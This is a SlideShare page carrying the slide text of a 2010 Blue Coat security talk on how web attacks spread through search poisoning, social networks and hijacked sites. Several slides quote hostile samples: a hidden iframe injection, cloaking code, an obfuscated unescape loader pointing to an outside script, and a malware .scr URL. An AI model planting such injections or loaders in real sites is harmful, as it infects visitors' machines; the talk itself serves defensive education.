Início
Conheça mais
Enviar pesquisa
Carregar
Entrar
Cadastre-se
Anúncio
Check these out next
Securing the Human (人を守るセキュリティ)
itforum-roundtable
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
NetCraftsmen
Bluecoat Services
ChessBall
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
SolarWinds
DNS Security Threats and Solutions
InnoTech
Infoblox Secure DNS Solution
Srikrupa Srivatsan
Cyber crime v3
Jamison Utter
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Mundo Contact
1
de
23
Top clipped slide
2010-11 The Anatomy of a Web Attack
12 de Mar de 2013
•
0 gostou
1 gostaram
×
Seja o primeiro a gostar disto
mostrar mais
•
3,377 visualizações
visualizações
×
Vistos totais
0
No Slideshare
0
De incorporações
0
Número de incorporações
0
Baixar agora
Baixar para ler offline
Denunciar
Tecnologia
2010-11 The Anatomy of a Web Attack by Dennis Pike, Systems Engineer, Bluecoat Systems
Raleigh ISSA
Seguir
Anúncio
Anúncio
Anúncio
Recomendados
Free website analysis at snoopstat.com
MohammadSaifulIslam45
41 visualizações
•
18 slides
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy
727 visualizações
•
24 slides
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing
5.6K visualizações
•
24 slides
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
Lumen Consulting
510 visualizações
•
58 slides
Getting Social
MatrixMediaFX
435 visualizações
•
55 slides
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
Markus Kucborski
791 visualizações
•
10 slides
Mais conteúdo relacionado
Destaque
(12)
Securing the Human (人を守るセキュリティ)
itforum-roundtable
•
2.4K visualizações
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
NetCraftsmen
•
2K visualizações
Bluecoat Services
ChessBall
•
4.4K visualizações
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
SolarWinds
•
10.8K visualizações
DNS Security Threats and Solutions
InnoTech
•
1.9K visualizações
Infoblox Secure DNS Solution
Srikrupa Srivatsan
•
3.7K visualizações
Cyber crime v3
Jamison Utter
•
693 visualizações
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Mundo Contact
•
1.8K visualizações
Content Analysis System and Advanced Threat Protection
Blue Coat
•
8.1K visualizações
Advanced Threat Protection - Sandboxing 101
Blue Coat
•
3.2K visualizações
Advanced DNS Protection
Srikrupa Srivatsan
•
2.1K visualizações
DNS Security Presentation ISSA
Srikrupa Srivatsan
•
9.6K visualizações
Similar a 2010-11 The Anatomy of a Web Attack
(20)
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Carles Ventura
•
210 visualizações
Risk and reward 220410
TWO Social
•
450 visualizações
Free lowcost dec2010
Highway T
•
621 visualizações
Risk & Reward in Social Media
Richard Spencer
•
355 visualizações
Riskrewardinsocialmedia
Jimi1032
•
165 visualizações
Risk & Reward In Social Media
TWO Social
•
810 visualizações
Measuring adblockers impact on site performance
Karan Kumar
•
909 visualizações
Creating Value In Social Networking
Lars Trieloff
•
716 visualizações
Panda vs Penguin Presentation
Aman Talwar
•
2.5K visualizações
RioInfo 2007 - Tecnologias Centradas no Usuário
Manoel Lemos
•
511 visualizações
Moodle Series - Learn Local - Embedding in Moodle
Yum Studio
•
1.3K visualizações
Make useof file-sharing
wilkmjw
•
824 visualizações
Web 2.0 for Educators
Fleep Tuque
•
806 visualizações
Creative Commons and Free Stuff to Spice Up Your Training
Michelle Lentz
•
712 visualizações
Why Portability matters (full presentation)
Ian Forrester
•
659 visualizações
Semantic Web: In Quest for the Next Generation Killer Apps
Jie Bao
•
2.6K visualizações
Technology lal
Heidi Dusek
•
576 visualizações
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
tudorwilliams
•
1.4K visualizações
Mobile Contents
driver86
•
320 visualizações
10 Things You Probably Didn't Know About Plone
Jazkarta, Inc.
•
1K visualizações
Anúncio
Mais de Raleigh ISSA
(20)
Raleigh issa chapter updates-slides-2014-9
Raleigh ISSA
•
824 visualizações
Raleigh issa chapter updates-slides-2014-8
Raleigh ISSA
•
471 visualizações
Raleigh issa chapter updates-slides-2014-7
Raleigh ISSA
•
439 visualizações
Raleigh issa chapter updates-slides-2014-6
Raleigh ISSA
•
683 visualizações
Managing privileged account security
Raleigh ISSA
•
6K visualizações
A10 issa d do s 5-2014
Raleigh ISSA
•
1.8K visualizações
Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh ISSA
•
880 visualizações
April 2014 Raleigh ISSA chapter update slides
Raleigh ISSA
•
554 visualizações
March 2014 B2B - Breaking into info sec
Raleigh ISSA
•
574 visualizações
March 2014 Raleigh ISSA chapter update slides
Raleigh ISSA
•
586 visualizações
February 2014 Raleigh Chapter ISSA Board update slides
Raleigh ISSA
•
515 visualizações
2014-01 Raleigh ISSA Chapter Updates January 2014
Raleigh ISSA
•
498 visualizações
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Raleigh ISSA
•
1.1K visualizações
2013-11 Raleigh ISSA Chapter Updates November 2013
Raleigh ISSA
•
628 visualizações
2013-10 Raleigh ISSA Chapter Updates October 2013
Raleigh ISSA
•
459 visualizações
2013-09 Raleigh ISSA Chapter Updates September 2013
Raleigh ISSA
•
304 visualizações
2013-08 Raleigh ISSA Chapter Updates August 2013
Raleigh ISSA
•
491 visualizações
2013-07 How to Win with Customers - Keith Pigues
Raleigh ISSA
•
589 visualizações
2013-07 Raleigh ISSA Chapter Updates July 2013
Raleigh ISSA
•
419 visualizações
2013-06 Raleigh ISSA Chapter Updates June 2013
Raleigh ISSA
•
389 visualizações
Último
(20)
AirMMax Motor Brochure.pdf
AirMMax Aeration Equipment Co., Ltd
•
0 visão
Business_Process_Outsourcing_and_Shared_Service_Centers_in_Georgia - Excellen...
NRKMurthy1
•
0 visão
Les09.ppt
AlhassanFederated
•
0 visão
Intelion Systems.pdf
IntelionSystems
•
0 visão
DEMO20_Cash Pool - Predemo Steps.pptx
VatsalaC1
•
0 visão
Data in Motion Tour ANZ Sydney 2023 Keynote.pdf
confluent
•
0 visão
Seize Success: Offshore Development Services in Mumbai | Unlock the Benefits ...
Sagar Salvi
•
0 visão
How Does Grocery Delivery App Generate Revenue.pdf
Shopia Wilson
•
0 visão
3DC Intro to Git Workshop
BeckhamWee
•
0 visão
Rive
Artmiker Studios
•
0 visão
Data Governance: From speed dating to lifelong partnership
Precisely
•
0 visão
Magento development company in Birmingham.pdf
IosAndWeb Technologies
•
0 visão
Leveraging streaming data in real-time to build a Single View of Customer (SVOC)
confluent
•
0 visão
IS INDEXED JOURNAL -SUBMIT YOUR RESEARCH PAPERS...!
dannyijwest
•
0 visão
A 100% Digital Bank: Using Real-time Data to Enable a New Digital Banking Exp...
confluent
•
0 visão
How to Build Real-Time Analytics Applications like Netflix, Confluent, and Re...
confluent
•
0 visão
finalppt-150606051347-lva1-app6892.pptx
AJAYVISHALRP
•
0 visão
Siechem AERO 55 600 V Insulated Twisted Twin Core Airframe Cables by Rohit Da...
Rohit Damodaran
•
0 visão
Trends in Cloud Computing Services | Nuvento USA
Nuvento Systems Pvt Ltd
•
0 visão
SoundBible
Artmiker Studios
•
0 visão
Anúncio
2010-11 The Anatomy of a Web Attack
The Anatomy of
a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
Agenda
State of the Web • Top categories • Top attacks The Anatomy of a Web Attack • Lures to web threats • Examples Dynamic Link Analysis 2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Best of the
Worst Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc. 3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Email vs Social
Networking Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent. 4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Domain:
Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36 Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Changing Web Habits
Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams 6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Threats Rising
Exponentially 2/3 of all known malicious code threats in 1 year (Symantec April’09) 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky) 7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Distribution Power
Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010 8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
An Invitation to
Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Evolution
Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Multi-Host Pages
SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds 11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Paths to Malware
Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Infected Site
www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html> 13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and
Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks 14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and
Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… 15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
16
© Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
17
© Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Hijacked Website
if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js 18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Search Engine
Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape('%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js 19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
What just happened?
Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect 20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples -
VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr 21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples –
Fake Warez 22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
© Blue Coat
Systems, Inc. 2010. All Rights Reserved.
Anúncio